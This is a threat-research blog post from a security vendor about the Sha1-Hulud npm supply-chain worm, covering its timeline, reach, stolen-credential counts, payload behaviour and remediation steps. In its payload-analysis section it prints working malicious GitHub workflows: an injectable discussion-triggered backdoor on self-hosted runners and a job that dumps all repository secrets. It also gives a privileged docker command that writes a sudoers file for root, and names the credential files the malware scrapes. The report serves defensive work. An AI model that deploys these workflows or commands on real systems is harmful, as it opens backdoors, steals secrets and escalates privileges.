Key takeaways

• A new Shai-Hulud–linked npm supply-chain campaign compromised major packages
  Popular projects from Zapier, ENS Domains, PostHog, and Postman were temporarily trojanized, leading to GitHub repos populated with stolen victim data. Some of these packages are highly prevalent, occurring in roughly 27 % of cloud and code environments scanned by Wiz.

• The number of compromised packages on npm is steadily growing, currently at ~700 in total
  Wiz Research and other vendors are monitoring newly added versions, but fortunately the vast majority of packages have already been reclaimed by their owners, including those from Zapier, Posthog and Postman, and the malicious versions have been removed from npm.

• The blast radius is already massive – 25,000+ malicious repos across ~500 GitHub users
  Wiz Research has identified widespread automated replication tied to this campaign.

• The attack is accelerating at ~1,000 new repos every 30 minutes
  Newly compromised packages continue to surface, many containing files tied directly to this activity.

• Exfiltration is conducted cross-victim, which means that your data may have been published as a repository on an unaffiliated GitHub user
  Your impacted users may also see other victims’ data in their accounts. GitHub has begun mitigating the Sha1-Hulud activity by revoking tokens, privatizing malicious repositories, and issuing notifications (decreasing the number of public repos down to ~300 on November 26), but many organizations remain exposed due to the broad cross-account spread of the stolen credentials.

• A new preinstall-phase malware variant increases exposure across build and runtime environments
  Executing during preinstall dramatically widens the blast radius across dev machines and CI/CD pipelines.

• Immediate investigation is recommended for any npm-based environment
  Given the campaign’s scale, pace, and ability to steal secrets, teams should urgently review dependencies and deploy remediation steps.

Timeline

• 01:22 UTC 11/24 - Earliest evidence of repositories being created on GitHub containing leaked secrets, based on GH Archive data (interestingly, this appears to have occurred slightly prior to the earliest evidence of malicious libraries being uploaded to npm).

• ~03:00 UTC 11/24 - Earliest evidence of malicious package versions being uploaded to npm.

• 22:45 UTC 11/25 - A potential second phase was first observed, in which private repositories for a single initial victim were published using compromised credentials from phase one. The description used for this phase is Sha1-Hulud: The Continued Coming .

• 09:00 UTC 11/26 - As of now Wiz Threat Research still observes many valid secrets sourced from hundreds of compromised entities.

• 01:00 UTC 11/26 - Exploitation of compromised credentials was further observed, by an attacker using repository descriptions to advertise: # Free AI at api.airforce https://discord.gg/AJDsM7jtbq. The initial push impacted roughly 3,200 repositories, and appears to have also publicized previously private repositories. (h/t @porobertdev) Some of these accounts also appear to have been used to "boost" the star counts of projects in the Tauri ecosystem. (h/t pilgrimlyieu) Some repository descriptions have since been updated to F**K Guillermo, F**K VERCEL --multi.

• ~09:00 UTC 26/11 - GitHub Support reaches out to affected users to inform them that it has begun removing repositories related to this activity and revoking leaked GitHub tokens.

• 16:00 UTC 26/11 - Wiz Threat Research and Wiz CIRT begin to observe abuse of leaked cloud and code keys such as AWS long-term credentials (AKIA) and GitHub PATs. In some instances GitHub tokens were abused in order to download source code from private repositories.

• 11:00 UTC 27/11 - As of now only ~15 malicious package versions remain available on npm (Wiz Threat Research has reported them and requested their removal).

What is this campaign?

This campaign continues the trend of npm supply-chain compromises referencing Shai-Hulud naming and tradecraft, though it may involve different actors. The threat leverages compromised maintainer accounts to publish trojanized versions of legitimate npm packages that execute credential theft and exfiltration code during installation.

Unlike the earlier variant, this wave introduces:

• Execution using install lifecycle scripts.

• New payload files - setup_bun.js and bun_environment.js.

Wiz Threat Research and Aikido have confirmed that the trojanized npm packages were uploaded to npm between November 21-23, 2025. Once installed, the malware exfiltrates developer and CI/CD secrets to GitHub repositories with descriptions referencing Shai-Hulud.

This variant executes only during the preinstall phase. The malware creates the following files: cloud.json, contents.json, environment.json, and truffleSecrets.json. It also attempts to create a discussion.yaml file inside the GitHub workflow. There seem to be support for running on Linux, Windows and MacOS based runners, with suitable payloads.

Update 11/24 19:00 UTC: Wiz Research can confirm that cross-victim exfiltration is taking place. Exfiltration of one victim's secrets to public repositories owned by a second, unrelated victim has been observed repeatedly.

The campaign’s behavior closely resembles the previous Shai-Hulud worm but may involve different threat actors, given differences in payload structure and propagation logic. No attribution has been confirmed at this time. Wiz has observed multiple environments where these packages were downloaded before their removal from npm, suggesting active exposure.

GitHub is currently removing attacker-created repositories associated with this campaign; however, the malware continues to create new repositories as part of the ongoing activity.

Scope and Prevalence

Our analysis of npm package distribution across cloud and code environments indicates that this campaign has touched several widely used open-source packages with hundreds of dependent packages, highlighting its potential reach across the software supply chain:

However, out of nearly 800 affected packages, only ~230 have any direct or indirect dependencies, with only 18 of these having 100 or more:

In terms of prevalence, @postman/tunnel-agent can normally be found in 27% of environments, posthog-node in 25%, followed by key AsyncAPI components such as @asyncapi/specs (20%), @asyncapi/specs (17%), and @asyncapi/openapi-schema-parser (17%), as well as posthog-js (15%), get-them-args (14%), shell-exec and kill-port (13%). However, the vast majority of affected packages are found in less than 1% of environments:

Preliminary Impact

We have reviewed a sample of approximated twenty thousand repositories created during the course of this campaign. Notably, there is a large duplication across exfiltrated data. This is partially attributable to repeated executions of the malicious code within a similar CI/CD context.

As a small sample of the broad reaching impact here, we have identified, verified, and deduplicated (as of the original publication date of this blogpost):

• 775 compromised GitHub access tokens

• 373 AWS credentials

• 300 GCP credentials

• 115 Azure credentials

Payload analysis

Wiz Threat Research is currently in the process of analyzing the malicious payload, and found that the attacker is adding multiple workflows.

• The first workflow works as a backdoor to the infected machines:

  • The payload registers the infected machine as a self hosted runner named 'SHA1HULUD'.

  • It then adds a workflow called .github/workflows/discussion.yaml that contains an injection vulnerability and runs specifically on self-hosted runners.

  • This allows the attacker to execute arbitrary commands on the infected machines in the future by opening discussions in the Github repository.

await this.octokit.request("PUT /repos/{owner}/{repo}/contents/{path}", {
           'owner': _0x349291,
           'repo': _0x2b1a39,
           'path': ".github/workflows/discussion.yaml",
           'message': "Add Discusion",
           'content': Buffer.from("\nname: Discussion Create\non:\n  discussion:\njobs:\n  process:\n    env:\n      RUNNER_TRACKING_ID: 0\n    runs-on: self-hosted\n    steps:\n      - uses: actions/checkout@v5\n      - name: Handle Discussion\n        run: echo ${{ github.event.discussion.body }}\n").toString("base64"),
           'branch': 'main'
         });

name: Discussion Create
on:
  discussion:
jobs:
  process:
    env:
      RUNNER_TRACKING_ID: 0
    runs-on: self-hosted
    steps:
      - uses: actions/checkout@v5
      - name: Handle Discussion
        run: echo ${{ github.event.discussion.body }}

• The second payload exfiltrates the Github defined secrets:

  • The .github/workflows/formatter_123456789.yml workflow is pushed to a newly created branch named add-linter-workflow-{Date.now()}.

  • It then lists and collects all secrets defined in the Github secrets section and uploads them as an artifact. This information is written as the actionsSecrets.json file in the exfiltration repositories.

  • The payload then downloads the newly created artifact. The file is downloaded to the compromised machine as part of the exfiltration processes.

  • Deletes the workflow and the newly created branch - in order to hide its exfiltration activities.

name: Code Formatter
on:
  push
jobs:
  lint:
    runs-on: ubuntu-latest
    env:
      DATA: ${{ toJSON(secrets)}}
    steps:
      - uses: actions/checkout@v5
      - name: Run Formatter
        run: |
          cat <<EOF > format.json
          $DATA
          EOF
      - uses: actions/upload-artifact@v5
        with:
          path: format.json
          name: formatting

Cloud Activity

• Multi-Cloud Targeting: The malware targets AWS, Azure, and Google Cloud Platform (GCP) by bundling official SDKs to operate independently of host tools.

• Credential Harvesting: It scrapes credentials from local configuration files (e.g., ~/.aws/credentials, ~/.azure/), environment variables, and internal cloud metadata services (IMDS) to steal temporary session tokens.

• Secret Exfiltration: Authenticated sessions are used to dump secrets from AWS Secrets Manager, Google Secret Manager, and Azure Key Vault.

• Persistence: The malware attempts to assume privileged roles (AWS STS) and manipulate IAM policies to maintain access or escalate privileges.

Docker Privilege Escalation

• Container Breakout: The malware attempts to gain root privileges by executing docker run --rm --privileged -v /:/host ubuntu bash -c "cp /host/tmp/runner /host/etc/sudoers.d/runner", which mounts the host's root filesystem into a privileged container to copy a malicious sudoers file, effectively granting passwordless root access to the compromised user.

CI Environment Checks

• The malware behaves slightly differently when infecting CI environments or developer machines

• In CI Environments: The malware executes synchronously. The package installation process will only conclude after the malware has finished its operations. This ensures the runner remains active for the entire infection process.In Non-CI Environments: The malware executes itself as a background process. This prevents the package installation from taking too long, which could potentially alert the user that something is wrong.

• The CI check is done by checking the following environment variables:

 process.env.BUILDKITE || process.env.PROJECT_ID || process.env.GITHUB_ACTIONS || process.env.CODEBUILD_BUILD_NUMBER || process.env.CIRCLE_SHA1

Backdoor Workflow

The discussion.yaml workflow appears to function as a persistence mechanism for compromised machines.

So far, we have not found evidence that this specific backdoor has been used in the wild. However, we were able to successfully validate its functionality through testing.

By recreating an infected machine and repository, we successfully managed to execute code on the compromised system simply by opening a new discussion in that repository.

Therefore, any public repository utilizing this workflow could still be used in the future to act as a backdoor to its associated infected machines.

Which products and packages are affected?

This attack compromised a large number of packages, including Zapier packages, ENS domains packages, ecosystem packages and more. Newly compromised packages are still being identified.

See the appendix for the full list, or refer to our IOC repository.

Which actions should security teams take?

Remove and replace compromised packages

• Clear npm cache:

npm cache clean --force
rm -rf node_modules

• Pin dependencies to known clean versions or roll back to pre-November 21, 2025 builds.

Rotate all credentials

• Revoke and regenerate npm tokens, GitHub PATs, SSH keys, and cloud provider credentials.

• Enforce phishing-resistant MFA for developer and CI/CD accounts.

Audit GitHub and CI/CD environments

• Search for newly created repositories with "Shai-Hulud" in the description.

• Review for unauthorized workflows or suspicious commits referencing hulud.

• Monitor for new npm publishes under your organization.

Harden pipelines

• Restrict or disable lifecycle scripts (postinstall, preinstall) in CI/CD.

• Limit outbound network access from build systems to trusted domains only.

• Use short-lived, scoped automation tokens.

How Wiz Can Help

Wiz customers can use the pre-built query in the Wiz Threat Intel Center to detect environments containing the affected npm packages.

The Threat Intel Center also contains the most up to date package information for Wiz customers.

Appendix

Malware Hashes

Impacted Packages

For a CSV of impacted packages, see: wiz-sec-public/wiz-research-iocs/

References

• Aikido Blogpost

• Step Security Blogpost

• Wiz Shai-Hulud blogpost

• Wiz IOCs